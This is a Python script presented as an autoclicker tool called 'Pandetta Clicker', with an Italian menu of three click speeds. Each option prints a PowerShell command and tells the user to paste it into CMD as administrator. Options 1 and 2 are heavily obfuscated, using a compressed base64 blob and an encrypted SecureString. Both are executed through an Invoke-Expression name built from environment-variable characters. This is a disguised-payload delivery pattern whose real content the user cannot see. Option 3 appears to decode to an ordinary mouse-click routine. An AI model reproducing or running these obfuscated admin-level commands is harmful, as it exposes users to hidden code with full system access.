from time import sleep
import os
import subprocess
import sys
import shutil
import getpass
from pystyle import Colors, Colorate, Center 
from colorama import init, Fore, Style

init(autoreset=True)

os.system('cls' if os.name == 'nt' else 'clear')
os.system('title Pandetta Clicker - by spartire' if os.name == 'nt' else '' )

def clear_screen():
    os.system('cls' if os.name == 'nt' else 'clear')

banner = '''  
  _   _ _ _           _____                _      _   _           _____ _ _      _             
 | \ | (_) |         |  __ \              | |    | | | |         / ____| (_)    | |            
 |  \| |_| | _____   | |__) |_ _ _ __   __| | ___| |_| |_ __ _  | |    | |_  ___| | _____ _ __ 
 | . ` | | |/ / _ \  |  ___/ _` | '_ \ / _` |/ _ \ __| __/ _` | | |    | | |/ __| |/ / _ \ '__|
 | |\  | |   < (_) | | |  | (_| | | | | (_| |  __/ |_| || (_| | | |____| | | (__|   <  __/ |   
 |_| \_|_|_|\_\___/  |_|   \__,_|_| |_|\__,_|\___|\__|\__\__,_|  \_____|_|_|\___|_|\_\___|_|   
                                                                                                                                                                                                                         
    '''

menu_text = '''

     1. 17 cps
     2. 20 cps
     3. 22-23 cps

'''
def print_banner(banner):
    lines = banner.splitlines()
    colored_lines = [Colorate.Horizontal(Colors.blue_to_green, Center.XCenter(line)) for line in lines]
    for line in colored_lines:
        print(line)
        sleep(0.10)

def print_menu():
    line = Colorate.Vertical(Colors.blue_to_green, Center.XCenter(menu_text))
    print(line)

def option1():
    
    clear_screen()
    header = '''
  __ ______                  
 /_ |____  |                 
  | |   / /    ___ _ __  ___ 
  | |  / /    / __| '_ \/ __|
  | | / /    | (__| |_) \__ |
  |_|/_/      \___| .__/|___/
                  | |        
                  |_|  
    '''
    print(Colorate.Horizontal(Colors.blue_to_green, header))

    guide_text = '''
PoWErshELl  "(NEw-ObJect sYStEm.IO.cOmPRESSION.DeflaTEstrEam( [SySteM.Io.memOrYSTReam] [CONVErt]::fromBAsE64StRINg('5Vbvb9owEP2OxP9wQtOUSBCFbOuHtpP6A3WrBi1KQEyrqikjV7Dm2JntQKut//suTmihhU0TnVSpfIBceHd+d3558WGStAY3GYL97uAVE8wwKeCgUa/lmokJRDfaYLq3GnphLgxL0TsVBpXMIlQzNkZNsHoty79xNoYxj7WGbrcDP+u1iw7np2kmlXEauUb1JvASzhvu5R1cm9jQD15TQQFUt28URCiSHmodT9Cpbk1HImlCzoSBnp40F8h5P1ZxehdyG7orfKTQpkwc9b52j4aDwflZ53x0Bu/Bv/YDv733AGvX+LSAljDfwh6ynkmWQEfOheMW3S5RpawPaE6kwomSuUhGTCRy7hTMVpgTrurQvV/yHsQXoF78Hbs2cPwm+EWd5SGV01ntr3k3nPup3BY9/GlTFJvFBtfvyqaGHqVV+CXOxUi5nDftbKdsMrXzUmhyKr8YgOMU/8D+PrR3XPgFDmXAa5r+CX3civ7tGqkNn7PUhv2F0IJNChpm2+injL0v9EBuL5xh/6XIJgyfp0OFjx3q7QaHClcdaqO+CocKnsiiwq0tKnx5FhWGz9OiwocW9W6zRW0loKfxqPAFeFTjAFohXqFCMcbkUGtMaTNQQ6M6gpXstEd8U90oUuY4M7lhnMQGjepv6Ms5qmiK1H29dswxVq2PTBupbuq1EFM5w9YplQOHWm/1oxDjpMsEnmfFOdD1KmwUz7Afm6ldZso4gvPKqBxtj+wKnIt1rLxjKYyS/HJ3tydpG45yY0h30MIfsD5hGUZZn8vLtl3mgs6SdK88ZtlwSGHxzqSgqjaYKmqADqrVFQEijpg5O75rB4tc43/nG5R86c1S8Q0sR3r6LeHgHxhDSdnW+1tGu+rx9jc=' ) ,[iO.coMpreSsiON.CompREssiONmODe]::dECompress ) | foREacH-objEct { NEw-ObJect SysTEm.IO.StreAMrEADEr($_ ,[SyStem.TExt.encodINg]::aScii) }).readtoEnD()|.( $EnV:COmspeC[4,15,25]-JoIn'')"

 INCOLLA QUESTA STRINGA SUL CMD COME AMMINISTRATORE !!
'''


    colored_text = Colorate.Horizontal(Colors.blue_to_green, guide_text)
    print(colored_text)
    input("\nPremi invio per uscire...")


def option2():

    clear_screen()
    header = '''
  ___   ___                   
 |__ \ / _ \                  
    ) | | | |   ___ _ __  ___ 
   / /| | | |  / __| '_ \/ __|
  / /_| |_| | | (__| |_) \__ |
 |____|\___/   \___| .__/|___/
                   | |        
                   |_| 
                                                               
    '''
    print(Colorate.Horizontal(Colors.blue_to_green, header))

    guide_text = '''
 poWErshelL    " ([rUnTimE.inTeRoPSeRVicES.mARshAL]::PtrtOSTRINGAUtO([runTiME.iNteropserVicES.MarshaL]::SecuREStRiNgTObsTR( $('76492d1116743f0423413b16050a5345MgB8AGwASgBBAG4AUwBBAFgAZwBlAHIARwBrAEYANABqAHMALwArAGkATQBZAEEAPQA9AHwAMwA2AGUAYQA3AGQAYwAxAGUAMAAyADEAZAA3ADcANABhAGIAYgAyADEAZAA5ADIAYgA3ADQANwAyAGYAMQA0AGMAZgA2AGIAZgA1ADkAMAA4AGIAMQBkADMANAAzADIAZgAxADEAZQBiADcAOQBiADEANQBmADUANAA5ADMAYgA4ADUAMgBhADIAYgA2ADMAZgA1ADEANABhADQAOAAzADkAYgBkADcAZAAwAGUAMgAxAGUAZQA5AGUANwBlADEAYwBjADQAMABhAGMAOQBhAGMANgBmAGIAMAAyAGUAYQA1ADUAYwAwAGIAYQAxAGUAYwBjADMAZQBiAGYAMQBlADEANwBjADUAZAA4ADkAMQBkADYAYwBiADgAYgBiADUAZQA0ADAAMwBkAGQAMwA3AGMANQA0ADkANgBhAGQANQA4AGUANgBkADQANwBhADEAZQAwADEAYQA5ADQANgA1ADcAMwA2ADEAZAA0AGQAYQBiADcAZQA0ADgAYQBmAGQAMQAwADYAOQAxADIAMgBiADYAOQBiAGYAYQA2AGIAZQA2AGMAMAAyAGMANgBjADcANwAyAGUANgBiADMAMwBjADkAMgA4AGIANgAzAGMAOAAxAGMAOQAwAGIAZgAzADcAYQBjAGIAMgA3AGQANAA5AGIAMQAwAGYAYwBlADIAYwAxADMANABlADQANgA1ADYAMABjADYAMQBmADEAYQBkADIAMgAzAGQANQA1AGUAZQAwADYAYgBhADAAMwA4AGEAYQA0AGEAYwA1ADkAOQAzADgAMgA5ADMANgBlADIANQA3AGYAZgBiAGYANQAyADUANgBhADkAZAAzAGIAZABmAGQAOQAwAGYANwA0ADQAZgA2AGEAYQA1ADEANwBmADUAYgBhADEAMQA2ADQAOAA1AGYANwA4ADcAZQAzAGIAZgBjADIAOABmADAANABiAGQANgAwADgANgA5ADMAZgAzAGIANQA0AGUAYQA0AGIAYQBmADEANwA1ADEANwBlADEAOABlADUAYgA4ADgAZgAzAGIAMgA1AGIAYgA0ADIAMQA4AGQAZAAyADQAMAA2AGUAZABkADQAOQA0ADUAZABjAA=='|COnvErTTO-SEcUReStRING -kE  (203..188)) ) ))|&( $SHElliD[1]+$sHelLId[13]+'X')"

 INCOLLA QUESTA STRINGA SUL CMD COME AMMINISTRATORE !!
'''


    colored_text = Colorate.Horizontal(Colors.blue_to_green, guide_text)
    print(colored_text)
    input("\nPremi invio per uscire...")

def option3():
    
    clear_screen()
    header = '''
  ___  ___      ___  ____                   
 |__ \|__ \    |__ \|___ \                  
    ) |  ) |_____ ) | __) |   ___ _ __  ___ 
   / /  / /______/ / |__ <   / __| '_ \/ __|
  / /_ / /_     / /_ ___) | | (__| |_) \__ |
 |____|____|   |____|____/   \___| .__/|___/
                                 | |        
                                 |_| 
                                                                                                  
    '''
    print(Colorate.Horizontal(Colors.blue_to_green, header))

    guide_text = '''

powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcAOwANAAoADQAKAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAATQBvAHUAcwBlAEMAbABpAGMAawBlAHIAIAB7AA0ACgAgACAAIAAgAFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0ADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAEkATgBQAFUAVAAgAHsADQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAGkAbgB0ACAAdAB5AHAAZQA7AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABNAE8AVQBTAEUASwBFAFkAQgBEAEgAQQBSAEQAVwBBAFIARQBJAE4AUABVAFQAIABtAGsAaABpADsADQAKACAAIAAgACAAfQANAAoADQAKACAAIAAgACAAWwBTAHQAcgB1AGMAdABMAGEAeQBvAHUAdAAoAEwAYQB5AG8AdQB0AEsAaQBuAGQALgBFAHgAcABsAGkAYwBpAHQAKQBdAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABNAE8AVQBTAEUASwBFAFkAQgBEAEgAQQBSAEQAVwBBAFIARQBJAE4AUABVAFQAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAWwBGAGkAZQBsAGQATwBmAGYAcwBlAHQAKAAwACkAXQANAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAATQBPAFUAUwBFAEkATgBQAFUAVAAgAG0AaQA7AA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0ADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAE0ATwBVAFMARQBJAE4AUABVAFQAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABpAG4AdAAgAGQAeAA7AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABpAG4AdAAgAGQAeQA7AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABpAG4AdAAgAG0AbwB1AHMAZQBEAGEAdABhADsADQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAGkAbgB0ACAAZAB3AEYAbABhAGcAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABpAG4AdAAgAHQAaQBtAGUAOwANAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABkAHcARQB4AHQAcgBhAEkAbgBmAG8AOwANAAoAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByACAAPQAgAHQAcgB1AGUAKQBdAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABTAGUAbgBkAEkAbgBwAHUAdAAoAHUAaQBuAHQAIABuAEkAbgBwAHUAdABzACwAIABJAE4AUABVAFQAWwBdACAAcABJAG4AcAB1AHQAcwAsACAAaQBuAHQAIABjAGIAUwBpAHoAZQApADsADQAKAA0ACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAcwBoAG8AcgB0ACAARwBlAHQAQQBzAHkAbgBjAEsAZQB5AFMAdABhAHQAZQAoAGkAbgB0ACAAdgBLAGUAeQApADsADQAKAA0ACgAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABjAG8AbgBzAHQAIABpAG4AdAAgAEkATgBQAFUAVABfAE0ATwBVAFMARQAgAD0AIAAwADsADQAKACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAGMAbwBuAHMAdAAgAGkAbgB0ACAATQBPAFUAUwBFAEUAVgBFAE4AVABGAF8ATABFAEYAVABEAE8AVwBOACAAPQAgADAAeAAwADIAOwANAAoAIAAgACAAIABwAHIAaQB2AGEAdABlACAAYwBvAG4AcwB0ACAAaQBuAHQAIABNAE8AVQBTAEUARQBWAEUATgBUAEYAXwBMAEUARgBUAFUAUAAgAD0AIAAwAHgAMAA0ADsADQAKACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAGMAbwBuAHMAdAAgAGkAbgB0ACAATQBPAFUAUwBFAEUAVgBFAE4AVABGAF8AUgBJAEcASABUAEQATwBXAE4AIAA9ACAAMAB4ADAAOAA7AA0ACgAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABjAG8AbgBzAHQAIABpAG4AdAAgAE0ATwBVAFMARQBFAFYARQBOAFQARgBfAFIASQBHAEgAVABVAFAAIAA9ACAAMAB4ADEAMAA7AA0ACgANAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAEwAZQBmAHQAQwBsAGkAYwBrACgAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIABJAE4AUABVAFQAWwBdACAAaQBuAHAAdQB0AHMAIAA9ACAAbgBlAHcAIABJAE4AUABVAFQAWwAyAF0AOwANAAoADQAKACAAIAAgACAAIAAgACAAIABpAG4AcAB1AHQAcwBbADAAXQAuAHQAeQBwAGUAIAA9ACAASQBOAFAAVQBUAF8ATQBPAFUAUwBFADsADQAKACAAIAAgACAAIAAgACAAIABpAG4AcAB1AHQAcwBbADAAXQAuAG0AawBoAGkALgBtAGkALgBkAHcARgBsAGEAZwBzACAAPQAgAE0ATwBVAFMARQBFAFYARQBOAFQARgBfAEwARQBGAFQARABPAFcATgA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgAGkAbgBwAHUAdABzAFsAMQBdAC4AdAB5AHAAZQAgAD0AIABJAE4AUABVAFQAXwBNAE8AVQBTAEUAOwANAAoAIAAgACAAIAAgACAAIAAgAGkAbgBwAHUAdABzAFsAMQBdAC4AbQBrAGgAaQAuAG0AaQAuAGQAdwBGAGwAYQBnAHMAIAA9ACAATQBPAFUAUwBFAEUAVgBFAE4AVABGAF8ATABFAEYAVABVAFAAOwANAAoADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkAEkAbgBwAHUAdAAoACgAdQBpAG4AdAApAGkAbgBwAHUAdABzAC4ATABlAG4AZwB0AGgALAAgAGkAbgBwAHUAdABzACwAIABNAGEAcgBzAGgAYQBsAC4AUwBpAHoAZQBPAGYAKAB0AHkAcABlAG8AZgAoAEkATgBQAFUAVAApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAUgBpAGcAaAB0AEMAbABpAGMAawAoACkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAASQBOAFAAVQBUAFsAXQAgAGkAbgBwAHUAdABzACAAPQAgAG4AZQB3ACAASQBOAFAAVQBUAFsAMgBdADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAaQBuAHAAdQB0AHMAWwAwAF0ALgB0AHkAcABlACAAPQAgAEkATgBQAFUAVABfAE0ATwBVAFMARQA7AA0ACgAgACAAIAAgACAAIAAgACAAaQBuAHAAdQB0AHMAWwAwAF0ALgBtAGsAaABpAC4AbQBpAC4AZAB3AEYAbABhAGcAcwAgAD0AIABNAE8AVQBTAEUARQBWAEUATgBUAEYAXwBSAEkARwBIAFQARABPAFcATgA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgAGkAbgBwAHUAdABzAFsAMQBdAC4AdAB5AHAAZQAgAD0AIABJAE4AUABVAFQAXwBNAE8AVQBTAEUAOwANAAoAIAAgACAAIAAgACAAIAAgAGkAbgBwAHUAdABzAFsAMQBdAC4AbQBrAGgAaQAuAG0AaQAuAGQAdwBGAGwAYQBnAHMAIAA9ACAATQBPAFUAUwBFAEUAVgBFAE4AVABGAF8AUgBJAEcASABUAFUAUAA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQASQBuAHAAdQB0ACgAKAB1AGkAbgB0ACkAaQBuAHAAdQB0AHMALgBMAGUAbgBnAHQAaAAsACAAaQBuAHAAdQB0AHMALAAgAE0AYQByAHMAaABhAGwALgBTAGkAegBlAE8AZgAoAHQAeQBwAGUAbwBmACgASQBOAFAAVQBUACkAKQApADsADQAKACAAIAAgACAAfQANAAoADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGIAbwBvAGwAIABJAHMASwBlAHkARABvAHcAbgAoAGkAbgB0ACAAawBlAHkAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACgARwBlAHQAQQBzAHkAbgBjAEsAZQB5AFMAdABhAHQAZQAoAGsAZQB5ACkAIAAmACAAMAB4ADgAMAAwADAAKQAgACEAPQAgADAAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAiAEAAIAAtAEwAYQBuAGcAdQBhAGcAZQAgAEMAUwBoAGEAcgBwAA0ACgANAAoAIwAgAEMAbwBzAHQAYQBuAHQAaQAgAHAAZQByACAAaQAgAHQAYQBzAHQAaQAgAGwAYQB0AGUAcgBhAGwAaQAgAGQAZQBsACAAbQBvAHUAcwBlAA0ACgAkAFYASwBfAFgAQgBVAFQAVABPAE4AMQAgAD0AIAAwAHgAMAA1ACAAIAAjACAAVABhAHMAdABvACAAbABhAHQAZQByAGEAbABlACAAYQB2AGEAbgB0AGkADQAKACQAVgBLAF8AWABCAFUAVABUAE8ATgAyACAAPQAgADAAeAAwADYAIAAgACMAIABUAGEAcwB0AG8AIABsAGEAdABlAHIAYQBsAGUAIABpAG4AZABpAGUAdAByAG8ADQAKAA0ACgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBBAHUAdABvAEMAbABpAGMAawBlAHIAIABjAG8AbgAgAHQAYQBzAHQAaQAgAGwAYQB0AGUAcgBhAGwAaQAgAGEAdAB0AGkAdgBvACEAIABUAGkAZQBuAGkAIABwAHIAZQBtAHUAdABvACAAWABCAHUAdAB0AG8AbgAxACAAbwAgAFgAQgB1AHQAdABvAG4AMgAgAHAAZQByACAAYQB0AHQAaQB2AGEAcgBsAG8ALgAiAA0ACgANAAoAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsADQAKACAAIAAgACAAaQBmACAAKABbAE0AbwB1AHMAZQBDAGwAaQBjAGsAZQByAF0AOgA6AEkAcwBLAGUAeQBEAG8AdwBuACgAJABWAEsAXwBYAEIAVQBUAFQATwBOADEAKQApACAAewANAAoAIAAgACAAIAAgACAAIAAgAFsATQBvAHUAcwBlAEMAbABpAGMAawBlAHIAXQA6ADoATABlAGYAdABDAGwAaQBjAGsAKAApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAgACgAWwBNAG8AdQBzAGUAQwBsAGkAYwBrAGUAcgBdADoAOgBJAHMASwBlAHkARABvAHcAbgAoACQAVgBLAF8AWABCAFUAVABUAE8ATgAyACkAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIABbAE0AbwB1AHMAZQBDAGwAaQBjAGsAZQByAF0AOgA6AFIAaQBnAGgAdABDAGwAaQBjAGsAKAApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAA0ADQAIAAgACMAIAB+ADIAMgAuADUAIABDAFAAUwANAAoAfQANAAoA

INCOLLA QUESTA STRINGA NEL CMD COME AMMINISTRATORE !!

'''


    colored_text = Colorate.Horizontal(Colors.blue_to_green, guide_text)
    print(colored_text)
    input("\nPremi invio per uscire...")


def main():
    while True:
        clear_screen()
        print_banner(banner)
        print_menu()
        choice = input(Colorate.Horizontal(Colors.blue_to_green, "\n\nScegli uno tra i tre autoclicker: "))

        if choice == "1":
            option1()
        elif choice == "2":
            option2()
        elif choice == "3":
            option3()
        else:
            print("Opzione non valida.")
            input("Premi invio per continuare...")
if __name__ == "__main__":
    main()


